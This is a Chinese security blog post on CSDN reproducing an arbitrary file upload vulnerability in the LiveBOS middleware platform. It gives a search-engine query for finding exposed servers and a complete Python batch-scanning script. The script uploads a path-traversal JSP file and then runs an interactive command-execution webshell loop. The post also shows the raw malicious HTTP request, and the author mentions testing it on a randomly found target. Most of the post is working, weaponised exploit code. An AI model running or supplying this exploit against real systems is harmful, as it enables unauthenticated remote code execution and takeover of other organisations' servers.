【漏洞复现】LiveBos UploadFile 任意文件上传漏洞

最新推荐文章于 2024-09-09 15:42:52 发布
最新推荐文章于 2024-09-09 15:42:52 发布
阅读量1.2k 收藏 8
点赞数 33
分类专栏: 漏洞复现 文章标签: 网络 网络安全 安全 web安全 计算机网络 密码学 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54799594/article/details/141024109
版权

          声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

LiveBOS,由顶点软件股份有限公司开发的对象型业务架构中间件及其集成开发工具,是一种创新的软件开发模式,以业务模型建立为核心,直接完成软件开发。它适用于各类基于WEB的专业应用软件和行业大型应用的开发。LiveBOS由三个相对独立的产品组成:运行支持支撑平台 LiveBOS Server,开发集成环境LiveBOS Studio以及运维管理工具LiveBOS Manager。然而,其接口UploadFile.do;.js.jsp存在任意文件上传漏洞,攻击者可以利用该漏洞获取系统服务器权限,从而控制该系统。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:web.body=="LiveBOS"

2.使用poc批量扫描

import requests
import urllib3
import re,string,random
from urllib.parse import urljoin
import argparse
import time
import ssl
import urllib.request
import random
import string
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    url = url.rstrip("/")
    target = url+"/feed/UploadFile.do;.js.jsp"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
        "Content-Type": "multipart/form-data; boundary=---------------------------11d2c49c8ddda2a65a0a90c3b02189a3"
    }

    data="""-----------------------------11d2c49c8ddda2a65a0a90c3b02189a3\r\nContent-Disposition: form-data; name="file"; filename="//../../../../tmptest1.jsp"\r\nContent-Type: image/png\r\n\r\n<% out.println("HelloWorldTest");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n-----------------------------11d2c49c8ddda2a65a0a90c3b02189a3""".encode('utf-8')
    try:
        response = urllib.request.Request(target, headers=headers, data=data, method="POST", unverifiable=True)
        res = urllib.request.urlopen(response)
        upload_status_code = res.getcode()
        upload_content = res.read().decode()
        if upload_status_code == 200 and 'oldfileName' in upload_content and 'newFileName' in upload_content:
            result_url = url + '/tmptest1.jsp;.js.jsp'
            result_response = urllib.request.Request(result_url, headers={"User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"}, method="GET", unverifiable=True)
            res = urllib.request.urlopen(result_response)
            result_status_code = res.getcode()
            result_content = res.read().decode()
            if result_status_code == 200 and 'HelloWorldTest' in result_content:
                print(f"\033[31mDiscovered:{url}: LiveBos_UploadFile_ArbiraryFileUpload!\033[0m")
                return True
    except Exception as e:
        pass

def run(url):
    url = url.rstrip("/")
    target = url + "/feed/UploadFile.do;.js.jsp"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
        "Content-Type": "multipart/form-data; boundary=---------------------------11d2c49c8ddda2a65a0a90c3b02189a3"
    }
    if check(url):
        while True:
            command = input("\033[34mPlease input command (stop input:exit):\033[0m")
            if "exit" not in command:
                filename = ''.join(random.choices(string.ascii_uppercase + string.digits, k=5))
                data = """-----------------------------11d2c49c8ddda2a65a0a90c3b02189a3\r\nContent-Disposition: form-data; name="file"; filename="//../../../../replace1.jsp"\r\nContent-Type: image/png\r\n\r\n<% java.io.InputStream in = Runtime.getRuntime().exec(\"replace2\").getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n-----------------------------11d2c49c8ddda2a65a0a90c3b02189a3"""
                data = data.replace('replace1',filename).replace('replace2',command).encode('utf-8')
                try:
                    response = urllib.request.Request(target, headers=headers, data=data, method="POST",unverifiable=True)
                    res = urllib.request.urlopen(response)
                    upload_status_code = res.getcode()
                    upload_content = res.read().decode()
                    if upload_status_code == 200 and 'oldfileName' in upload_content and 'newFileName' in upload_content:
                        result_url = url + '/{}.jsp;.js.jsp'.format(filename)
                        result_response = urllib.request.Request(result_url, headers={"User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"},method="GET", unverifiable=True)
                        res = urllib.request.urlopen(result_response)
                        result_status_code = res.getcode()
                        result_content = res.read().decode()
                        if result_status_code == 200:
                            print(result_content)
                except Exception as e:
                    pass
            else:
                break

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        run(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")

cmd运行poc脚本:python poc.py -f host.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

1.构造数据包:

POST /feed/UploadFile.do;.js.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Type: multipart/form-data; boundary=---------------------------11d2c49c8ddda2a65a0a90c3b02189a3
Content-Length: 343

-----------------------------11d2c49c8ddda2a65a0a90c3b02189a3
Content-Disposition: form-data; name="file"; filename="//../../../../tmptest.jsp"
Content-Type: image/png

<% out.println("HelloWorldTest");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
-----------------------------11d2c49c8ddda2a65a0a90c3b02189a3

2.数据包分析 

  1. 请求行:POST /feed/UploadFile.do;.js.jsp HTTP/1.1,表示这是一个POST请求,目标URL是/feed/UploadFile.do;.js.jsp,使用的HTTP协议版本是1.1。

  2. 请求头:包括Host、User-Agent和Content-Type等信息。

    • Host: x.x.x.x,表示请求的目标服务器地址。
    • User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36,表示发起请求的客户端信息,这里是使用Chrome浏览器的用户代理字符串。
    • Content-Type: multipart/form-data; boundary=---------------------------11d2c49c8ddda2a65a0a90c3b02189a3,表示请求体的类型是多部分表单数据,边界字符串为-----------------------------11d2c49c8ddda2a65a0a90c3b02189a3
    • Content-Length: 343,表示请求体的长度为343字节。

  3. 请求体:包含了要上传的文件内容。

    • 边界字符串:-----------------------------11d2c49c8ddda2a65a0a90c3b02189a3,用于分隔不同的表单字段。
    • 文件信息:Content-Disposition: form-data; name="file"; filename="//../../../../tmptest.jsp",表示这是一个名为"file"的表单字段,文件名为"//../../../../tmptest.jsp"。
    • 文件类型:Content-Type: image/png,表示文件的类型是PNG图片。
    • 文件内容:<% out.println("HelloWorldTest");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>,这是一段JSP代码,输出"HelloWorldTest"并删除当前servlet路径对应的文件。

3.结束跑路

1.构造数据包,上传一个tmptest.jsp文件

2.URL访问刚刚上传的文件ip/tmptest.jsp;.js.jsp​​​​​​​

每篇一言:​​​​​​​憧憬是距离理解最遥远的感情。

Cityミ slaves
关注
专栏目录
LiveBOS UploadFile.do 任意文件上传漏洞复现(XVE-2023-21708)
0xSec
08-01 955
LiveBOS UploadFile.do 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
JeeSpringCloud uploadFile.jsp 文件上传漏洞复现
0xSec
11-28 1059
JeeSpringCloud 是一款免费开源的 Java 互联网云快速开发平台。JeeSpringCloud 访问 /static/uploadify/uploadFile.jsp 可上传任意文件,并可通过 uploadPath 参数指定文件上传路径,导致服务器被控制。
[漏洞分析]LiveBos文件上传漏洞复现及绕过分析
LiangYueSec的博客
08-05 490
[漏洞分析]LiveBos文件上传漏洞复现及绕过分析
LiveBOS-UploadImage.do-任意文件上传漏洞
棉花糖的博客
08-01 485
LiveBOS灵动业务架构平台,是面向对象的业务支撑平台与建模工具。在LiveBosUploadImage.do接口中,发现了一处任意文件上传漏洞,攻击者可利用该漏洞上传任意文件。
漏洞复现】蓝凌EIS api.aspx 任意文件上传漏洞
凝聚力安全团队
06-19 308
蓝凌EIS api.aspx 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器,导致服务器失陷。蓝凌EIS,是一款专为成长型企业打造的沟通、协同、社交的一动办公平台,涵盖了OA、沟通、客户。人事以及知识库等管理需求,最终目的是打造简单而高效的工作方式,真正做到企业管理的信息化。
React Native Webview安全问题解决办法
lxyoucan的博客
03-19 3296
威胁描述 根据CVE披露的WebView远程代码执行漏洞信息(CVE-2012-663、CVE-2014-7224),Android系统中存在一共三个有远程代码执行漏洞的隐藏接口。分别是位于android/webkit/webview中的“searchBoxJavaBridge”接口、android/webkit/AccessibilityInjector.java中的“accessibility”接口和“accessibilityTraversal”接口。调用此三个接口的APP在开启辅助功能选项中第三方
【1day】复现LiveBOS ShowImage.do 接口存在任意文件读取漏洞
记录并分享学习安全的知识点..
08-21 897
LiveBOS(简称LiveBOS)是顶点软件股份有限公司开发的一个对象型业务架构中间件及其集成开发工具。它以业务模型建立为中心,直接完成软件开发的创新软件开发模式。适合于各类基于WEB的专业应用软件与行业大型应用的开发。LiveBOS ShowImage.do 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感文件。 ​
漏洞复现】用友NC-任意文件上传-uploadFile
知黑而守白
05-05 269
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业。用友NC允许攻击者通过uploadFile接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。
SparkShop开源商城 uploadFile 任意文件上传漏洞复现
0xSec
08-26 934
SparkShop开源商城 uploadFile 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
全程云OA AttachFile/UploadFile 任意文件上传漏洞复现
0xSec
08-20 327
全程云OA AttachFile/UploadFile 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
POC分享 LiveBOS UploadFile.do 任意文件上传漏洞复现(XVE-2023-21708)
qq_56895879的博客
08-06 200
【代码】POC分享 LiveBOS UploadFile.do 任意文件上传漏洞复现(XVE-2023-21708)
漏洞复现LiveBos任意文件上传漏洞 带批量POC
qq_48368964的博客
08-11 1486
LiveBOS,由顶点软件股份有限公司开发的对象型业务架构中间件及其集成开发工具,是一种创新的软件开发模式,以业务模型建立为核心,直接完成软件开发。.js.jsp存在任意文件上传漏洞,攻击者可以利用该漏洞获取系统服务器权限,从而控制该系统。,但实际上上传的是一个包含Java Server Pages (JSP)代码的文本文件。: 这是一段JSP代码,当该文件被作为网页请求时会被执行。这样的相对路径来遍历目录结构,以将文件保存到服务器的其他位置。,这是文件上传时常用的数据格式,并指定了数据边界。
uploadify上传无反应_取证实战—Hacker利用某类网站的文件上传漏洞批量渗透
weixin_39662611的博客
12-13 749
下面讲的会是一个比较有趣的故事,某类Web网站系统因为存在文件上传漏洞,文件包含漏洞,被Hacker利用后进行了批量的渗透,造成一大部分网站的后台被植入后门,对相关企事业单位造成不良影响。0x01概述其实,这个漏洞就是由于对于上传的文件校验不够严格,导致出现了文件上传漏洞,同时利用了网站存在的文件包含漏洞,使得Hacker能够获取Webshell得到的信息如下,以下内容为从Hacker电...
​数据链路层——流量控制&可靠传输机制 ​
最新发布
qq_25467441的博客
09-09 740
例题:一个信道的数据传输率为4kb/s ,单向传播时延为30ms ,如果使停止-等待协议的信道最大利用率达到80%,要求的数据帧长度至少为。设数据帧的长度为L比特,则发送方发送全部的数据需要时间:L/4。“停止-等待”就是每发送完一个分组就停止发送,等待对方确认,在收到确认后再发送下一个分组。因为是在讨论可靠传输的原理,所以并不考虑数据是在哪一个层次上传送的。发送方在一个发送周期内,有效地发送数据所需要的时间占整个发送周期的比率。数据链路层的流量控制是点对点的,而传输层的流量控制是端到端的。
200 Gb/s和400 Gb/s网络
dncsk的专栏
09-07 1432
116.200 Gb/s和400 Gb/s网络简介写在前面 :1.需要英文原文请自行官网下载2.本人无授权故亦不接受相关付费服务 如有商业性需求建议寻找有资质的书籍供应商购买3.翻译纯粹为爱发电,因为机器翻译所以错乱较多 建议参照英文原文对比使用 4.欢迎评论区提出建议或意见 原则上不删除评论 原则上不回复私信 和解呈现200GBASE-RPCSPMDIEEEStd802.3-2022,IEEE以太网标准第八节116.200Gb/s和400Gb/s网络116.1概述116.1范围本条款描述了200千兆位和4
[网络]HTTP协议 Cookie与Session
m0_74910646的博客
09-07 792
HTTP Cookie(也称为 Web Cookie、浏览器 Cookie 或简称 Cookie)是服务器发送到 用户浏览器并保存在浏览器上的一小块数据,它会在浏览器之后向同一服务器再次发 起请求时被携带并发送到服务器上。通常,它用于告知服务端两个请求是否来自同一浏览器,如保持用户的登录状态、记录用户偏好等。HTTP Session 是服务器用来跟踪用户与服务器交互期间用户状态的机制。由于 HTTP 协议是无状态的(每个请求都是独立的),因此服务器需要通过 Session 来记住用户的信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cityミ slaves

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值